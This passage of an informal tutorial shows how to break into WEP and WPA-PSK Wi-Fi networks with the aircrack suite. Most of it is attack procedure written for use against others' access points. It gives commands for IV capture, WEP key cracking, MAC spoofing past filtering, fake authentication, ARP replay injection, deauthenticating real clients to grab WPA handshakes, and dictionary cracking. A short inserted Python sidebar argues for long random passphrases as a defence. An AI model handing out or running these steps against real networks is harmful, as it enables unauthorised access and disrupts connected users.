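Even with perfectly random IVs, a collision is more likely than not after fewer than 5,000 frames, and a sequential counter on a busy network exhausts the whole space in hours. That is why the countermeasures earlier in this page treat WEP as something to replace, not something to rotate keys under.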

Setting up your tools


We're gonna need 3 or 4 shells open, and we have 5 tools:
airodump - Grabbing IVs
aircrack - Cracking the IVs
airdecap - Decoding captured packets
aireplay - (My Favourite) Packet injector to attack APs.
kismet - Network Sniffer, can grab IVs as well.
For a standard WEP hack we'll usually only need airodump, aircrack, and kismet (server and client). If we run into some problems we might have to use aireplay to fiddle about. I'll leave you to config all these tools up; for the most part they should just be defaults, with the exception of kismet.

Finding the Network


First step is we need to find a network to crack. Start up kismet and start sniffing for APs. Leave it on for a bit so that it can discover all the important information about the networks around. What we want from kismet is:

Encryption type: Is it WEP 64-bit? 128-bit?
What channel is it on? Can greatly speed up IV collection.
AP's IP Address
BSSID
ESSID

All this info isn't required but the more you have, the more options you have later to crack and sniff. We can get a lot of this from airodump as well but I find the channel is important.

Capturing IVs
Alright, we know what we wanna crack, so let's start capturing packets. You can use kismet to capture files but I prefer airodump because it keeps a running count of all the IVs I've captured, and if I crack while still capturing, airodump will automatically update aircrack with new IVs as it finds them. Note: kismet can interfere with airodump, so make sure you close it down before starting airodump. Airodump is pretty straightforward, with its command line looking something like this:
./airodump <interface> <output prefix> [channel] [IVs flag]

interface is your wireless interface to use - required.
output prefix is just the filename it'll prepend - required.
channel is the specific channel we'll scan; leave blank or use 0 to channel hop.
IVs flag is either 0 or 1, depending on whether you want all packets logged, or just IVs.

My wireless card is ath0, the output prefix I'll use is "lucid", the channel we sniffed from kismet is 6, and the IVs flag is 1 because we just want IVs. So we run:
./airodump ath0 lucid 6 1

Airodump will come up with a graph showing us all the APs and their relevant info, as well as client stations connected to any of the APs.

 BSSID              PWR  Beacons   # Data  CH  MB   ENC   ESSID
 00:23:1F:55:04:BC   76    21995   213416   6  54.  WEP   hackme

 BSSID              STATION            PWR  Packets  Probes
 00:23:1F:55:04:BC  00:12:5B:4C:23:27  112     8202  hackme
 00:23:1F:55:04:BC  00:12:5B:DA:2F:6A   21     1721  hackme

The second line shows us some info about the AP as well as the number of beacons and data packets we've collected from the AP. The two last lines show us two authenticated clients: where they are connected to and the packets they are sending. We won't use this client info in a straight theory hack, but in practice we'll need this info to actively attack the AP. This step may take a long time or could be very short. It depends how busy the AP is and how many IVs we are collecting. What we are doing is populating a file "lucid.ivs" with the IV-related info from every packet. Next, we'll feed this to aircrack. To move onto the next step, we'll want at least 100,000 packets (under # Data in airodump), but probably more.

Using IVs to Decrypt the Key


Ok, pretend you have enough IVs now to attempt a crack. Go to a new terminal (without stopping airodump - remember it'll auto-update as new IVs are found) and we'll start aircrack. It looks something like this:
./aircrack [options] <input file>

There are a lot of options, so you can look them up yourself; I'll be using common ones here that should get you a crack. Our input file is "lucid.ivs", and the options we will use are:

-a 1 : forces a WEP attack mode (2 forces WPA)
-b for the bssid or -e for the essid : whichever is easier to type, but I like using a BSSID because it's more unique.
-n 64 or -n 128 : WEP key length, omit if not known by now.

So our command will look like:
./aircrack -a 1 -b 00:23:1F:55:04:BC -n 128 lucid.ivs

and off it goes, resembling the picture from the top. Keep an eye on the Unique IV count as it should increase if airodump is still running. For all intents and purposes you are done. That'll pop open most old wireless routers with some traffic on them.

Anticipated Problems
There are lots of problems that can come up that will make the above fail, or work very slowly.

No traffic
No traffic is being passed, therefore you can't capture any IVs. What we need to do is inject some special packets to trick the AP into broadcasting. Covered below in WEP Attacks.

MAC Address filtering
The AP is only responding to connected clients, probably because MAC address filtering is on. Using airodump's screen you can find the MAC address of authenticated users, so just change your MAC to theirs and continue on. Using the -m option you can tell aircrack to filter packets by MAC address, e.g. -m 00:12:5B:4C:23:27

Can't crack even with tons of IVs
Some of the statistical attacks can create false positives and lead you in the wrong direction. Try using -k N (where N=1..17) or -y to vary your attack method. Increase the fudge factor: by default it is at 2, and specifying -f N (where N>=2) will increase your chances of a crack, but take much longer. I find that doubling the previous fudge factor is a nice progression if you are having trouble.

Still nothing
Find the AP by following the signal strength and ask the admin what the WEP key is.

WPA Cracking
Differences
WPA is an encryption algorithm that takes care of a lot of the vulnerabilities inherent in WEP. WEP is, by design, flawed. No matter how good or crappy, long or short, your WEP key is, it can be cracked. WPA is different. A WPA key can be made good enough to make cracking it unfeasible. WPA is also a little more cracker friendly. By capturing the right type of packets, you can do your cracking offline. This means you only have to be near the AP for a matter of seconds to get what you need. There are advantages and disadvantages to both.

WPA Flavors
WPA basically comes in two flavors, RADIUS or PSK. PSK is crackable, RADIUS is not so much. PSK uses a user defined password to initialize the TKIP, temporal key integrity protocol. There is a password and the user is involved; for the most part that means it is flawed. The TKIP is not really crackable as it is a per-packet key, but upon the initialization of the TKIP, like during an authentication, we get the password (well, the PMK anyways). A robust dictionary attack will take care of a lot of consumer passwords. RADIUS involves physically transferring the key and encrypted channels blah blah blah; look it up to learn more about it, but 90% of commercial APs do not support it, as it is more of an enterprise solution than a consumer one.

The Handshake
The WPA handshake was designed to occur over insecure channels and in plaintext, so the password is not actually sent across. There are some fancy dancy algorithms in the background that turn it into a primary master key, PMK, and the like, but none of that really matters because the PMK is enough to connect to the network. The only step we need to do is capture a full authentication handshake from a real client and the AP.

This can prove tricky without some packet injection, but if you are lucky enough to capture a full handshake, then you can leave and do the rest of the cracking at home. We can force an authentication handshake by launching a Deauthentication Attack, but only if there is a real client already connected (you can tell in airodump). If there are no connected clients, you're outta luck. Like for WEP, we want to know the channel the WPA network is sitting on, but the airodump command is slightly different. We don't want just IVs, so we don't specify an IV flag. This will produce "lucid.cap" instead of "lucid.ivs". Assume WPA is on channel 6 and the wireless interface is ath0.
./airodump ath0 lucid 6

Dictionary Brute Force


The most important part of brute forcing a WPA password is a good dictionary. Check out http://www.openwall.com/wordlists/ for a 'really' good one. It costs money, but it's the biggest and best I've ever seen (40 Million words, no duplicates, one .txt file). There is also a free reduced version from the same site, but I'm sure resourceful people can figure out where to get a good dictionary from. When you have a good dictionary the crack is a simple brute force attack:
./aircrack -a 2 -b 00:23:1F:55:04:BC -w /path/to/wordlist

Either you'll get it or you won't... depends on the strength of the password and if a dictionary attack can crack it.
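The "depends on the strength of the password" point from the WPA Flavors, Handshake and Dictionary Brute Force sections above can be put in numbers. What the page calls the "primary master key" is the Pairwise Master Key (PMK), and WPA-PSK derives it from the passphrase with PBKDF2-HMAC-SHA1, 4096 rounds, salted with the SSID. The Python below is an added example, not code from the article or from aircrack: it derives the PMK against the published IEEE 802.11i test vector, measures how many derivations per second one CPU core manages, and compares the worst-case time to exhaust a 40-million-word list with the time to exhaust a random 12-character passphrase. The 62-symbol alphabet and the assumed 10,000x speed-up for a well-equipped attacker are assumptions of the example.

```python
import hashlib
import time

PBKDF2_ROUNDS = 4096   # fixed by the WPA/WPA2-Personal specification
PMK_BYTES = 32         # 256-bit Pairwise Master Key


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the PMK the way WPA-PSK does: PBKDF2-HMAC-SHA1 over the passphrase,
    salted with the SSID, 4096 rounds, 32 bytes out.  Every offline guess against
    a captured handshake has to pay for this derivation, which is the only brake
    on guessing speed; the passphrase's entropy is the real defence."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ROUNDS, PMK_BYTES)


def measure_guess_rate(ssid: str = "IEEE", samples: int = 20) -> float:
    """Rough single-core PBKDF2 rate (derivations per second) on this machine."""
    t0 = time.perf_counter()
    for i in range(samples):
        wpa_pmk(f"constructed-sample-{i}", ssid)    # constructed inputs, not real passphrases
    return samples / (time.perf_counter() - t0)


def candidates_for_random_passphrase(length: int, alphabet_size: int) -> float:
    """Size of the search space for a uniformly random passphrase."""
    return float(alphabet_size) ** length


def years_to_exhaust(candidates: float, guesses_per_second: float) -> float:
    """Worst-case time to try every candidate at a given guess rate."""
    return candidates / guesses_per_second / (365.25 * 24 * 3600)


if __name__ == "__main__":
    # Published IEEE 802.11i Annex H test vector: passphrase "password", SSID "IEEE"
    print("PMK:", wpa_pmk("password", "IEEE").hex())
    rate = measure_guess_rate()
    print(f"~{rate:,.0f} derivations/s on one CPU core")
    # Assumed attacker budget: 10,000 times this single core's rate.
    attacker_rate = rate * 10_000
    for label, n in (("40M-word dictionary", 40e6),
                     ("random 12 chars, 62 symbols", candidates_for_random_passphrase(12, 62))):
        print(f"{label:>28}: {years_to_exhaust(n, attacker_rate):.2e} years worst case")
```

Running it shows the asymmetry the article is getting at: the whole 40-million-word list falls in minutes to hours even on modest hardware, while 62^12 candidates are out of reach by many orders of magnitude at the same rate. Choosing a long random passphrase, rather than hiding the handshake, is what makes WPA-PSK "good enough", and the 802.1X/RADIUS option from Countermeasure 8 removes the shared passphrase altogether.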

Using Aireplay
Aireplay is the fun part. You get to manipulate packets to trick the network into giving you what you want.

WEP Attacks
Attacks used to create more traffic on WEP networks to get more IVs.

ARP Injection: ARP Replay is a classic way of getting more IV traffic from the AP. It is the turtle. Slow but steady and almost always works. We need the BSSID of the AP and the BSSID of an associated client. If there are no clients connected, it is possible to create one with another WEP attack explained below: Fake Authentication Attack. With airodump listening, we attack:
./aireplay -3 -b <AP MAC Address> -h <Client MAC Address> ath0

Note: The -3 specifies the type of attack (3=ARP Replay). This will continue to run, and airodump, listening from another terminal, will pick up any reply IVs.

Interactive Packet Replay: Interactive Packet Replay is quite a bit more advanced and requires capturing packets and constructing your own. It can prove more effective than simple ARP requests, but I won't get into packet construction here. A useful attack you might try is the re-send all data attack; basically you are asking the AP to re-send you everything. This only works if the AP re-encrypts the packets before sending them again (and therefore gives you a new IV). Some APs do, some don't.
./aireplay -2 -b <AP MAC> -h <Client MAC> -n 100 -p 0841 -c FF:FF:FF:FF:FF:FF ath0

Fake Authentication Attack: This attack won't generate any more traffic, but it does create an associated client MAC address useful for the above two attacks. It's definitely not as good as having a real, connected client, but you gots to do what you gots to do. This is done easiest with another machine because we need a new MAC address, but if you can manually change your MAC then that'll work too. We'll call your new MAC address "Fake MAC". Now most APs need clients to reassociate every 30 seconds or so or they think they're disconnected. This is pretty arbitrary, but I use it and it has worked; if your Fake MAC gets disconnected, reassociate quicker. We need both the essid and bssid and our Fake MAC.
./aireplay -1 30 -e '<ESSID>' -a <BSSID> -h <Fake MAC> ath0

If successful, you should see something like this:


23:47:29  Sending Authentication Request
23:47:29  Authentication successful
23:47:30  Sending Association Request
23:47:30  Association successful :-)

Now you can use the above two attacks even though there were no clients connected in the first place! If it fails, there may be MAC Address Filtering on so if you really want to use this, you'll have to sniff around until a client provides you with a registered MAC to fake.

WPA Attacks
So far, the only way to really crack WPA is to force a re-authentication of a valid client. We need a real, actively connected client to break WPA. You might have to wait a while.

Deauthentication Attack
This is a simple and very effective attack. We just force the connected client to disconnect then we capture the re-connect and authentication, saves time so we don't have to wait for the client to do it themselves (a tad less "waiting outside in the car" creepiness as well). With airodump running in another console, your attack will look something like this:
./aireplay -0 5 -a <AP MAC> -c <Client MAC> ath0

After a few seconds the re-authentication should be complete and we can attempt to Dictionary Brute Force the PMK.
